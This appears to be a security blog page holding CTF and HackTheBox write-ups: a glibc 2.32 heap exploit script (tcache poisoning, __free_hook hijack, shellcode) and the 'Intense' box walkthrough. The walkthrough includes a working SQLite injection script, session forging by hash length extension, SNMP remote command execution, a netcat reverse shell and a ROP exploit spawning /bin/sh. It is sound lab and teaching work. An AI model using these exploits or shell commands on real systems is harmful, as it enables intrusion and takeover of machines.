Do note that in this writeup, I nop'd out the sleep for the sake of local testing. However, running it with the provided ynetd binary (as the CTF server is no longer up) with a 3 second timeout for each option added onto my script still had it over 10 minutes under the sigalarm limit, so it should have been fine during the actual competition scenario.

from pwn import *
elf = ELF('./challenge')
libc = ELF('./') # 2.32
p = remote('localhost', 1337)
def wait():
def alloc(size, data, line=True):
assert(size > 0x100 and size <= 0x2000)
if len(data) == size:
line = False
if line:
def free(idx):
def leak(idx):
def edit(idx, data, line=True):
if line:
alloc(0x438, 'A' * 0x438) # 0
alloc(0x448, 'B' * 8) # 1, leave fd_nextsize part be null if target to backward consolidate onto is of large size
alloc(0x108, 'test') # 2
alloc(0x438, 'C' * 0x438) # 3, smaller than B
alloc(0x108, 'test') # 4
alloc(0x418, 'D' * 0x418) # 5
alloc(0x458, 'E' * 0x458) # 6, bigger than B
alloc(0x108, 'test') # 7
alloc(0x500, 'test') # 1, trigger largebin allocation, because of different sizes, we'll have 2 sets of pointer in each chunk in largebin
free(0) # backwards consolidate to help us start forging size, this goes to unsorted now from largebin, also have largebin pointers now from the chunk it coalesced from
alloc(0x438 + 0x30, 'A' * 0x448 + p64(0x2151)[:-1]) # 0, to help forge chunk header
alloc(0x448-0x30, 'B' * (0x448-0x30)) # 3, clear our unsorted bin, also very important because this will be linked into the unsorted chain to help us with the dangling pointer partial overwrite
# 0, 1, 2, 3, 4, 5, 7
# now recover large bins and bring stuff back into unsorted
alloc(0x438, 'C' * 0x438) # 6
alloc(0x458, 'E' * 0x458) # 8
# 0, 1, 2, 3, 4, 5, 6, 7, 8
free(6) # unsorted chain
free(5) # coalesce in unsorted to get leftover pointers
# 0, 1, 2, 4, 7
# with unlink, 3 and end of 5 will be getting heap pointers (but 5 will have nulls in front because of forged size metadata)
alloc(0x438, 'C' * 8) # 3, fix the fd pointer, pulling back from unsorted
alloc(0x418 + 0x20, 'D' * (0x418) + p64(0x461)) # 5, fix the bk pointer, pulling from the one I coalesced, sorts an unsorted chunk to largebin
# 0, 1, 2, 3, 4, 5, 7
# at this point we have an unsorted and largebin, let's clean up the unsorted and largebin
alloc(0x430, 'test') # 6
alloc(0x410, 'test') # 8
alloc(0x808, 'G' * 0x808) # 9
alloc(0x4f8, 'H' * 0x4f8) # 10
alloc(0x468, 'temp') # 11
# for stashing into tcache (since tcache won't get wiped unless we call malloc in this program)
alloc(0x108, 'stash') # 12
alloc(0x108, 'stash') # 13
alloc(0x108, 'stash') # 14
alloc(0x108, 'stash' + '\x00' * 3 + p64(0) + (p64(0) + p64(0x21)) * 13) # 15, for the later 0x1510 fake chunk that i will free to tcache poison
alloc(0x108, 'stash') # 16
alloc(0x108, 'stash') # 17
alloc(0x108, 'temp') # 18, so no back coalescing later when we send 17 to unsorted
edit(9, (p64(0) + p64(0x21)) * (0x800 / 16) + p64(0x2150), line=False)
# back coalesce
free(10)"achieved backwards coalesce")
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17
# everything from 0 - 9 is overlapped
heapbase = u64(p.recv(14)[8:].ljust(8, '\x00')) - 0x15c0'heap base: 0x%x' % heapbase)
# libc 2.32 has null ending for main arena + 96 libc address
alloc(0xa90, p64(0) * 3 + p64(0x421)) # 10, should align right over index 5, fix size of index 8
alloc(0x2000, 'test') # 18 send unsorted chunk into largebin, get largebin pointers into index 5
libcleak = u64(p.recv(6).ljust(8, '\x00'))
libc.address = libcleak - 0x1bf270'libc base: 0x%x' % libc.address)
free(10) # go back up
# fixing index 5 size
alloc(0x670, 'test') # 10
alloc(0x430, (p64(0) + p64(0x21)) * (0x410 / 16) + p64(0) + p64(0x441)) # 18
# recoalesce it up
alloc(0x108, p64(0) * 2 + (p64(0) + p64(0x21))*5) # 10, fix size of index 8
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17
# now we need to get stuff into tcache to be able to tcache poison, but they keep clearing tcache
# so tcache stash unlink onto malloc_par's tcache_max_byte
# but to do tcache stash unlink, we technically need to stash 6 chunks into tcache and 2 chunks into smallbin, and then modify bk of last chunk getting stashed
# here, tcache is wiped everytime we call malloc so that won't work... so we need 15 chunks of the same time, to all free and then move the latter 8 to smallbin, and then overwrite bk of last one to stash
# we have 0x108 in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10 as of now need 5 more
0x56494efda520: 0x000056494fd352c0 0x000056494fd36b40 S
0x56494efda530: 0x000056494fd35b50 X 0x000056494fd35c60
0x56494efda540: 0x000056494fd360a0 X 0x000056494fd361b0
0x56494efda550: 0x000056494fd365f0 S 0x000056494fd36a30 X
0x56494efda560: 0x000056494fd35730 0x000056494fd37050 S
0x56494efda570: 0x000056494fd35710 X 0x000056494fd37d60
0x56494efda580: 0x000056494fd381d0 X 0x000056494fd382e0 X
0x56494efda590: 0x000056494fd383f0 X 0x000056494fd38500 X
0x56494efda5a0: 0x000056494fd38610 X 0x000056494fd38720 X
0x56494efda5b0: 0x0000000000000000
0x56494fd37d50 is the cutoff of the massive unsorted chunk at this point
from here, looks like a good choice to save index 9, 1, and 6 (so one for tcache poison, one for bk overwrite, and the other just for padding/backup purposes (also don't want an extra unsorted chunk)
so we will free 0 3 5 8 11 and have free slots 0 3 5 8 11 18, we can use one of these to help as pad
however freeing some of these directly is bad as it creates a messy unsorted chain, better to do the allocate 2 chunks, recoalesce back trick to make our target chunks to be freed 0x21
# coalesce 11 into big unsorted
# fix index 3, remember to fix the 0x111 metadata issue (for 2, 4, 7), but we can repair this later
alloc(0x480, (p64(0) + p64(0x21)) * (0x430 / 16) + (p64(0) + p64(0x21)) * 5) # 11
# fix index 5
alloc(0x900, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * (0x80 / 2) + (p64(0) + p64(0x21)) * 10) # 11
# free index 8 now too, could have been done earlier
# fix index 9 to size metadata 0x1511 for potential tcache poison
alloc(0x17f0, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * 2 + p64(0) + p64(0x1511)) # 5, around size 0x1420~0x1430ish to escape the memset on tcache_perthread_struct
# repair the 0x111 size for 2, 4, 7 (7 is still clean, so it's good) note how among 1, 6, 9, only 6 is before one of the 0x110 chunks? use 6 for the bk overwrite
alloc(0x820, (p64(0) + p64(0x21)) * (0x320 / 16) + p64(0) + p64(0x111)) # 3
alloc(0x450, (p64(0) + p64(0x21)) * 4 + p64(0) + p64(0x111)) # 5
free(3)'hopefully cleaned up heap')
# get another unsorted
# empty are 0 3 5 8 11 18, until the newly added unsorted bin from freeing 0 runs out, the large chunk will be in largebin, but then will move back to unsorted since the new unsorted can't support all 5 allocations
alloc(0x108, 'stash') # 0
alloc(0x108, 'stash') # 3
alloc(0x138, 'stash') # 5 (otherwise metadata for 10 gets overwritten)
alloc(0x108, 'temp') # 5
alloc(0x108, 'stash') # 8
# now allocate a big one so next one can overlap with 6
alloc(0xd10, '\x00') # 11
alloc(0x108, 'stash') # 18
alloc(0x108, 'stash') # 5, free this one early on so it goes into tcache, and helps prevents 18 from consolidating with unsorted
# now we finally have 15 of these 0x110 chunks, we need the one in 18 to be the last in smallbin
0x563e099eb520: 0x0000563e09b562c0 X 0x0000563e09b57b40
0x563e099eb530: 0x0000563e09b56b50 X 0x0000563e09b563d0 X
0x563e099eb540: 0x0000563e09b570a0 X 0x0000563e09b57760 X
0x563e099eb550: 0x0000563e09b575f0 0x0000563e09b57a30 X
0x563e099eb560: 0x0000563e09b56820 X 0x0000563e09b58050
0x563e099eb570: 0x0000563e09b56710 X 0x0000563e09b56930
0x563e099eb580: 0x0000563e09b591d0 X 0x0000563e09b592e0 X
0x563e099eb590: 0x0000563e09b593f0 X 0x0000563e09b59500 X
0x563e099eb5a0: 0x0000563e09b59610 X 0x0000563e09b59720 X
0x563e099eb5b0: 0x0000563e09b57650 X 0x0000000000000000
0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18
12 to 17 is a chain, (12 will back coalesce), 0, 3 is a chain, 8, 10 is a chain, 5 is on top of unsorted, 7 is under a potential new unsorted (so will coalesce with the smallbin and move to unsorted), 18 needs to be the last one inserted, 2, 4 are isolated
so let's do the following free order: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18
# only 1, 6, 9, 11 still left
alloc(0x450, '\x00') # 0, trigger movement from unsorted chain to smallbin for the 0x110 chunks
payload = (p64(0) + p64(0x21)) * 5 + p64(0) + p64(0x110) + p64(heapbase + 0x1090) + p64(libc.symbols['mp_'] + 80 - 0x10) # overwrite .tcache_bins
alloc(0x430, payload) # 0, overlap smallbin 0x110 head's chunk
alloc(0x108, '\x00') # 2, trigger smallbin stash unlink'tcache stash unlinked, overwrote mp_.tcache_bin')
# can't touch 0x110 smallbin ever again
# 0, 1, 2, 9, 11, use 9 as the target for tcache poison, 1 was leftover but doesn't matter really (was a mistake on my part, but good that i still saved as a backup)
alloc(0x780, '\x00') # 3
alloc(0x1500, p64(0) * 4 + 'fizzbuzz') # 4
free(9) # created tcache chain
malicious_addr = ((heapbase + 0x2050) >> 12) ^ libc.symbols['__free_hook']
alloc(0x400, p64(0) * 9 + p64(0x1511) + p64(malicious_addr)[:-1]) # 4, tcache poison
super_gadget = libc.address + 0x00000000001296b0 #: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
poprsi = libc.address + 0x00000000000ba607#: pop rsi; ret;
poprdx = libc.address + 0x0000000000089972#: pop rdx; ret;
poprdi = libc.address + 0x0000000000027b26 #: pop rdi; ret;
alloc(0x1500, '\x00') # 5
alloc(0x1500, p64(super_gadget)) # 6'tcache poisoned onto __free_hook, overwriting with super gadget at 0x%x' % super_gadget)
shellcode = '''
mov rax, 2
mov rdi, %s
xor rsi, rsi
xor rdx, rdx
mov rsi, rdi
sub rsi, 0x100
xchg rdi, rax
xor rax, rax
mov dl, 100
xor rax, rax
mov al, 1
mov rdi, 1
mov al, 60
xor rdi, rdi
'''% int(heapbase + 0x2920)
shellcode = asm(shellcode)
# need it to call setcontext + 61 and then stack pivot onto our heap, poprdi written afterwards due to push rcx, and rcx derives its value from [rdx + 0xa8]
payload = (p64(0) + p64(heapbase + 0x2410) + p64(0) * 2 + p64(libc.symbols['setcontext'] + 61) + p64(poprdi) + p64(heapbase) + p64(poprsi) + p64(0x5000) + p64(poprdx) + p64(7) + p64(libc.symbols['mprotect']) + p64(heapbase + 0x2920 + 0x10)).ljust(0xa0, '\x00') + p64(heapbase + 0x2410 + 0x30) + p64(poprdi)
alloc(0x500, payload) # 7, have to avoid other larger chunks cause they might be seen as tcache and get pointers inside since i spammed heap
alloc(0x500, 'flag.txt'.ljust(0x10, '\x00') + shellcode)
print p.recvall()

Concluding thoughts:

While this challenge was overall pretty decent as it showed some up to date glibc tricks, I felt that some of the elements were unnecessary and added artificial difficulty. This challenge could have been just as difficult conceptually if it allowed for 2-3 more allocation spots (rather than force players who have the correct plans to rewrite their exploit several times), and combining a sigalarm with a 2 second sleep in the main menu didn't add any value. Additionally, while the custom patch made in this libc makes sense and did contribute to overall quality, I do see libc patching happening more often and hope CTF authors do not abuse it to create extremely contrived heap note problems.

Feel free to let me know if I made any mistakes in my explanations (as this problem was quite complex), congrats to Poortho for taking first blood, and thanks again to all those teammates that worked with me in DiceGang, which placed 4th overall!

Saturday, November 14, 2020

Intense HacktheBox Writeup


Intense was a hard box involving some web exploitation techniques such as sqlite injection and hash extension attack, snmp exploitation, as well as an easy pwnable for root. Overall, I thought sokafr did a great job with this box.

To begin, our initial port scan revealed the following ports from masscan:

22/tcp  open   ssh     syn-ack ttl 63

80/tcp  open   http    syn-ack ttl 63

161/tcp closed snmp    reset ttl 63

Opening up port 80, we see the following:

It provides us with guest:guest as credentials, as well as a link to the zipped source code, which we can download. Inside, you can find some templates and other misc. info, but the most important files are the 4 python files of this flask app (which uses a sqlite database):,,, and

Some important takeaways from this include the following observations:

@app.route("/login", methods=["GET"])
def login():
return render_template("login.html", page="login")
@app.route("/postlogin", methods=["POST"])
def postlogin():
# return user's info if exists
data = try_login(request.form)
if data:
resp = make_response("OK")
# create new cookie session to authenticate user
session = lwt.create_session(data)
cookie = lwt.create_cookie(session)
resp.set_cookie("auth", cookie)
return resp
return "Login failed"
def hash_password(password):
""" Hash password with a secure hashing function """
return sha256(password.encode()).hexdigest()
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
return (rv[0] if rv else None) if one else rv
def try_login(form):
""" Try to login with the submitted user info """
if not form:
return None
username = form["username"]
password = hash_password(form["password"])
result = query_db("select count(*) from users where username = ? and secret = ?", (username, password), one=True)
if result and result[0]:
return {"username": username, "secret":password}
return None
view raw hosted with ❤ by GitHub

The user information from here is stored in the sqlite database, based on the data for username and secret (which is the sha256 hash of your input for password). The usage of query_db() and its behavior makes it safe from sqli at this login point.

The session is built and checked in the following manner at some of the following functions:

@app.route("/postlogin", methods=["POST"])
def postlogin():
# return user's info if exists
data = try_login(request.form)
if data:
resp = make_response("OK")
# create new cookie session to authenticate user
session = lwt.create_session(data)
cookie = lwt.create_cookie(session)
resp.set_cookie("auth", cookie)
return resp
return "Login failed"
def index():
session = get_session(request)
if session and "username" in session:
user = get_user(session["username"], session["secret"])
return render_template("home.html", page="home", user=user)
return render_template("home.html", page="home")
SECRET = os.urandom(randrange(8, 15))
class InvalidSignature(Exception):
def sign(msg):
""" Sign message with secret key """
return sha256(SECRET + msg).digest()
def verif_signature(data, sig):
""" Verify if the supplied signature is valid """
return sign(data) == sig
def parse_session(cookie):
""" Parse cookie and return dict
@cookie: "key1=value1;key2=value2"
return {"key1":"value1","key2":"value2"}
b64_data, b64_sig = cookie.split('.')
data = b64decode(b64_data)
sig = b64decode(b64_sig)
if not verif_signature(data, sig):
raise InvalidSignature
info = {}
for group in data.split(b';'):
if not group:
key, val = group.split(b'=')
info[key.decode()] = val
except Exception:
return info
def create_session(data):
""" Create session based on dict
@data: {"key1":"value1","key2":"value2"}
return "key1=value1;key2=value2;"
session = ""
for k, v in data.items():
session += f"{k}={v};"
return session.encode()
def create_cookie(session):
cookie_sig = sign(session)
return b64encode(session) + b'.' + b64encode(cookie_sig)
def get_session(request):
""" Get user session and parse it """
if not request.cookies:
if "auth" not in request.cookies:
cookie = request.cookies.get("auth")
info = lwt.parse_session(cookie)
except lwt.InvalidSignature:
return {"status": -1, "msg": "Invalid signature"}
return info
def is_admin(request):
session = get_session(request)
if not session:
return None
if "username" not in session or "secret" not in session:
return None
user = get_user(session["username"], session["secret"])
return user.role == 1
view raw hosted with ❤ by GitHub

To summarize, the cookie is composed of an “auth” cookie, which is composed of 2 base64 portions separated by a period. The first portion is based on the return value of try_login(), which is a dictionary of username and secret. Using this dictionary, it formats the session as username=username;secret=hash;. Afterwards, the cookie gets a signature from the previous data by taking the digest of sha256(SECRET + data) where SECRET is a random bytestring of random length between 8 and 15; this is the second portion of the cookie. Then both the data and this signature are encoded and returned for the cookie value of “auth.” In many subsequent operations, get_session() is called, which calls parse_session(), which first verifies the contents of the data with the signature. Interestingly enough, if you find a way to bypass this verification, the way parse_session() behaves would allow you to append data to replace keys that get already set in the loop beforehand.

Becoming admin lets you interact with some interesting functionality:

def admin_view_log(filename):
if not path.exists(f"logs/{filename}"):
return f"Can't find {filename}"
with open(f"logs/{filename}") as out:
def admin_list_log(logdir):
if not path.exists(f"logs/{logdir}"):
return f"Can't find {logdir}"
return listdir(logdir)
def admin_home():
if not is_admin(request):
return render_template("admin.html")
@admin.route("/admin/log/view", methods=["POST"])
def view_log():
if not is_admin(request):
logfile = request.form.get("logfile")
if logfile:
logcontent = admin_view_log(logfile)
return logcontent
return ''
@admin.route("/admin/log/dir", methods=["POST"])
def list_log():
if not is_admin(request):
logdir = request.form.get("logdir")
if logdir:
logdir = admin_list_log(logdir)
return str(logdir)
return ''
view raw hosted with ❤ by GitHub

There's a ridiculously obvious lfi here. Now, would there be any endpoints that would allow us to extract data to become admin?

Let's take a look at a feature the guest user has access to, the submitmessage() function:

@app.route("/submitmessage", methods=["POST"])
def submitmessage():
message = request.form.get("message", '')
if len(message) > 140:
return "message too long"
if badword_in_str(message):
return "forbidden word in message"
query_db("insert into messages values ('%s')" % message)
except sqlite3.Error as e:
return str(e)
return "OK"
def badword_in_str(data):
data = data.lower()
badwords = ["rand", "system", "exec", "date"]
for badword in badwords:
if badword in data:
return True
return False
view raw hosted with ❤ by GitHub

You're restricted to a 140 byte message, and there are some blacklisted words. However, now query_db isn't even really used “correctly," as the application is just directly formatting your input in, leading to an obvious sqlite injection. One thing to note is that it doesn't really show you the result besides success or failure, so this is a clear case of a error based injection. I just used load_extension when the comparison in my error brute force is false; this would return an authorization error (plus the extension won't even exist). My teammate Bianca had another interesting way to error brute this, relying on passing bad inputs to json_extract when the comparison fails to trigger an error.

Messing around briefly in db-fiddle, I will be basing my script off the following sqli template:

injection: ' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--

query: insert into messages values ('' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--')

I wrote the following script to retrieve the admin username and hash with a simple linear brute, as the username probably will just be admin, and the hex charset is small enough:

import requests
URL = 'http://intense.htb'
target = f"{URL}/submitmessage"
sess = requests.Session()"{URL}/postlogin", data={"username":"guest", "password":"guest"})
def check(payload):
r =, data={"message":payload})
return True if "not authorized" not in r.text else False
def leak(username=True):
offset = 0
result = ''
charset = 'abcdef0123456789' if not username else 'abcdefghijklmnopqrstuvwxyz'
leak_target = "secret" if not username else "username"
for i in range(0, 64, 1):
for c in charset:
payload = f"(select substr({leak_target},{i+1},1) from users limit 1 offset {offset}) = '{c}'"
template = f"' or (select case when {payload} then 'W' else load_extension('L', 0x1) end));--"
assert(len(template) <= 140)
if check(template):
result += c
print(f"Result so far: {result}")
if c is charset[-1]:
return result
return result
print(f"username: {leak()}")
print(f"hash: {leak(username=False)}")

I ended up recieving the following hash: f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105

But it's not crackable with any wordlist or rule combination I have... this is where the way the application signs sessions and checks them comes in. Remember how it signed it with the secret in front before hashing? Under these conditions, sha256 is vulnerable to the hash extension attack. This post explains this attack much better, as I just ended up relying on the hash_extender tool. In our case, we know the hash function, the data, as well as the original signature, so we have all the conditions ready for this attack, in which we append data to it to generate a valid signature without knowing the secret (and appending the data can make us admin since the session parser doesn't check for duplicates). As for the attack, the general gist is that if you know the state of a hash, you can create a valid hash with appended data to the input to the function by setting the hashing algorithm state back to the signature's value, so the algorithm continues to hash from there (and this will produce a valid result!).

Since the secret is a variable length, I wrote the following script to bruteforce a valid session:

from base64 import b64encode, b64decode
from subprocess import PIPE, Popen
import requests, binascii
URL = "http://intense.htb/"
sessions = requests.Session()"{URL}postlogin", data={"username":"guest", "password":"guest"})
signature = binascii.hexlify(b64decode(sessions.cookies.get_dict()['auth'].split('.')[1]))
commands = []
for i in range(8, 16, 1):
command = ["./hash_extender", "-d", "username=guest;secret=84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec;", "-s", signature, "--signature-format=hex",
"-a", ";username=admin;secret=f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105;", "-l", str(i)]
process = Popen(command, stdout=PIPE)
(output, err) = process.communicate()
for c in commands:
fake_sig = c.decode().split('\n')[2].split(' ')[2]
forged = c.decode().split('\n')[3].split(' ')[2]
fake = b64encode(binascii.unhexlify(forged)).decode() + "." + b64encode(binascii.unhexlify(fake_sig)).decode()
r = requests.get(url=f"{URL}admin", cookies={"auth":fake})
print("Trying: " + fake + "\n")
if '403' not in r.text:
view raw hosted with ❤ by GitHub

Now, with a valid session, we can go to the admin functions and perform lfi.

With some requests, I also noticed the user flag (and the source code for the pwnable) in the user directory with payload ../../../../../../../../../home/user.

Recalling our earlier enumeration, I remember the snmp port. Pulling out /etc/snmp/snmpd.conf, I see the following:

agentAddress udp:161
view systemonly included .
view systemonly included .
rocommunity public default -V systemonly
rwcommunity SuP3RPrivCom90
# Note that setting these values here, results in the corresponding MIB objects being 'read-only'
# See snmpd.conf(5) for more details
sysLocation Sitting on the Dock of the Bay
sysContact Me <user@intense.htb>
# Application + End-to-End layers
sysServices 72
# Process Monitoring
# At least one 'mountd' process
proc mountd
# No more than 4 'ntalkd' processes - 0 is OK
proc ntalkd 4
# At least one 'sendmail' process, but no more than 10
proc sendmail 10 1
# Disk Monitoring
# 10MBs required on root disk, 5% free on /var, 10% free on all other disks
disk / 10000
disk /var 5%
includeAllDisks 10%
# System Load
# Unacceptable 1-, 5-, and 15-minute load averages
load 12 10 5
# send SNMPv1 traps
trapsink localhost public
# Event MIB - automatically generate alerts
# Remember to activate the 'createUser' lines above
iquerySecName internalUser
rouser internalUser
# generate traps on UCD error conditions
defaultMonitors yes
# generate traps on linkUp/Down
linkUpDownNotifications yes
# Arbitrary extension commands
extend test1 /bin/echo Hello, world!
extend-sh test2 echo Hello, world! ; echo Hi there ; exit 35
master agentx
view raw snmpd.conf hosted with ❤ by GitHub

Seeing the rw communitstring made me immediately think of rce over snmp, which is very well documented here. To quote the article:

The SNMP community string is essentially a plaintext password that allows access to a device’s statistics and configuration.

Since there is a length limit to the payloads (255 chars for command) with nsExtend related operations, I ended up generating a shorter ssh key to give myself ssh access as the Debian-snmp user with the following commands:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1VxdqPOpZvaJtuvtTMZJlchmQCLw8cC0tvD79eSlaL0hsS0XRFRaAKFf55UP1SarbED+teHFQUPbLa6uJlBxJQrPLQfujmo6su7P2jGPDZrwxIgKA7Om8cUvLXuNdHrTVwze68z7QBCIi6m1ofHBvZJOdWMt6O0idpybWefz7Cw== root@kaliVM > /dev/shm/w"'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "cat /dev/shm/w > /var/lib/snmp/.ssh/authorized_keys"'

Remember to trigger it each time with: snmpwalk -v 2c -c SuP3RPrivCom90 nsExtendObjects

When you lfi the source code of the pwnable (note_server.c) earlier on, you can see that it opened its port on 5001, so we can port forward it out:

ssh -N -L 5001: Debian-snmp@intense.htb -i key

However, we still need libc and the binary, and from the lfi on passwd, we know Debian-snmp shell is /bin/false. So I ended up popping a shell with the following commands so I can transfer files out (we had to use nohup to prevent snmp from hanging and then crashing, and some fiddling was required for the commands to work):

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' =  'wget -q -O /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = 'chmod +x /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = '/dev/shm/nc 1337 -e /bin/sh'

The following was the source:

// gcc -Wall -pie -fPIE -fstack-protector-all -D_FORTIFY_SOURCE=2 -Wl,-z,now -Wl,-z,relro note_server.c -o note_server
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFFER_SIZE 1024
void handle_client(int sock) {
char note[BUFFER_SIZE];
uint16_t index = 0;
uint8_t cmd;
// copy var
uint8_t buf_size;
uint16_t offset;
uint8_t copy_size;
while (1) {
// get command ID
if (read(sock, &cmd, 1) != 1) {
switch(cmd) {
// write note
case 1:
if (read(sock, &buf_size, 1) != 1) {
// prevent user to write over the buffer
if (index + buf_size > BUFFER_SIZE) {
// write note
if (read(sock, &note[index], buf_size) != buf_size) {
index += buf_size;
// copy part of note to the end of the note
case 2:
// get offset from user want to copy
if (read(sock, &offset, 2) != 2) {
// sanity check: offset must be > 0 and < index
if (offset < 0 || offset > index) {
// get the size of the buffer we want to copy
if (read(sock, &copy_size, 1) != 1) {
// prevent user to write over the buffer's note
if (index > BUFFER_SIZE) {
// copy part of the buffer to the end
memcpy(&note[index], &note[offset], copy_size);
index += copy_size;
// show note
case 3:
write(sock, note, index);
int main( int argc, char *argv[] ) {
int sockfd, newsockfd, portno;
unsigned int clilen;
struct sockaddr_in serv_addr, cli_addr;
int pid;
/* ignore SIGCHLD, prevent zombies */
struct sigaction sigchld_action = {
.sa_handler = SIG_DFL,
.sa_flags = SA_NOCLDWAIT
sigaction(SIGCHLD, &sigchld_action, NULL);
/* First call to socket() function */
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
perror("ERROR opening socket");
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int)) < 0)
perror("setsockopt(SO_REUSEADDR) failed");
/* Initialize socket structure */
bzero((char *) &serv_addr, sizeof(serv_addr));
portno = 5001;
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = inet_addr("");
serv_addr.sin_port = htons(portno);
/* Now bind the host address using bind() call.*/
if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
perror("ERROR on binding");
clilen = sizeof(cli_addr);
while (1) {
newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
if (newsockfd < 0) {
perror("ERROR on accept");
/* Create child process */
pid = fork();
if (pid < 0) {
perror("ERROR on fork");
if (pid == 0) {
/* This is the client process */
else {
} /* end of while */
view raw note_server.c hosted with ❤ by GitHub

This is just a variation of the previous forking stack overflow server pwns I've written extensively about in both my Rope and Patents writeup, so I'll skim through this pwn. It's another forking note app, with PIE, FULL RELRO, and canary (which is trivial to beat once you leak since it is forking).

Your options are ‘\x01’ for write, ‘\x02’ for copy, and ‘\x03’ for show. When you write data, you tell it the length, and it adds the length to an index to check if their sum is over the buffer size. If it's not, you can send in data with specified length size to the note char array starting at the current index, and it increments your index by the buffer size you requested. Do note that you can only send in a byte for the requested size.

For copy, you get 2 bytes to specify an offset, and the offset is checked to remain in the range of 0 and the current index. However, the size to be copied isn't checked, so there is a potential overflow once it copies from the note buffer at the specified offset to the note buffer at the current index. It also increases the index by the specified copy amount, so we can read out of bounds with this as well (as show doesn't check).

For show, there isn't nothing much to know except that it writes out data and returns, so the fork ends.

In my exploit, I basically first increased the index to 1024 and abused copy's lack of checks to extend the index so that the buffer printed with option 3 will leak canary, stack addresses, and pie base. Then I wrote a rop chain with proper padding and canary in front to leak libc addresses in the front of the buffer (and adjusted it to increase the index to 1024), then had it copy the length of the rop itself from offset 0 to the current index (1024), allowing for an overflow to leak libc once we trigger a return with show. Then apply the same principle to dup2 the file descriptors and pop open a shell. Here is my final script:

from pwn import *
context.log_level = 'debug'
elf = ELF('./note_server')
libc = ELF('./')
TIME = 0.1
IP = 'localhost'
FD = 4
p = remote(IP, 5001)
def reconnect():
return remote(IP, 5001)
#1040 till rbp, 1032 till canary
#can only send a byte for size/offset
def write(data):
size = len(data)
times = len(data) / 255
extra = len(data) % 255
for i in range(times):
write_helper(255, data[i*255:i*255+255])
write_helper(extra, data[-extra:])
def write_helper(size, data):
def copy(offset, size):
def show():
padding = 'B' * 8
copy(1024, 255)
show() #ends the function each time
leaks = p.recv(1032 + 24)
canary = u64(leaks[1032:1032+8])
rbp = u64(leaks[1040:1048])
elf.address = u64(leaks[1048:1056]) - 0xf54"Canary: %s" % hex(canary))"Stack leak: %s" % hex(rbp))"Pie base: %s" % hex(elf.address))
p = reconnect()
ropnop = elf.address + 0x00000000000008ce # ret;
poprdi = elf.address + 0x0000000000000fd3 # pop rdi; ret;
poprsir15 = elf.address + 0x0000000000000fd1 # pop rsi; pop r15; ret;
payload = padding + p64(canary) + p64(rbp) + p64(poprdi) + p64(FD) + p64(poprsir15) + p64(['write']) + p64(0) + p64(elf.symbols['write'])
write(payload.ljust(1024, 'A'))
copy(0, len(payload))
leaks = p.recv(0x450)
libc.address = u64(leaks[0x448:0x450]) - libc.symbols['write']"Libc Base: %s" % hex(libc.address))
p = reconnect()
payload = padding + p64(canary) + p64(rbp)
payload += p64(poprdi) + p64(FD) + p64(poprsir15) + p64(0) + p64(0) + p64(libc.symbols['dup2'])
payload += p64(poprdi) + p64(FD) + p64(poprsir15) + p64(1) + p64(0) + p64(libc.symbols['dup2'])
payload += p64(poprdi) + p64(FD) + p64(poprsir15) + p64(2) + p64(0) + p64(libc.symbols['dup2'])
payload += p64(poprdi) + p64("/bin/sh").next()) + p64(ropnop) + p64(libc.symbols['system'])
write(payload.ljust(1024, 'A'))
copy(0, len(payload))

And that should get us root shell! Thanks once again to sokafr for the fun box, and pottm and bjornmorten for giving my writeup a read through before publishing.

Sunday, October 4, 2020

CUCTF 2020 Dr. Xorisaurus Heap Writeup (glibc 2.32 UAF)

Here is my writeup for my 2.32 glibc heap challenge (Dr. Xorisaurus) from CUCTF 2020; make sure to check out the writeup for my kernel challenge Hotrod as well!

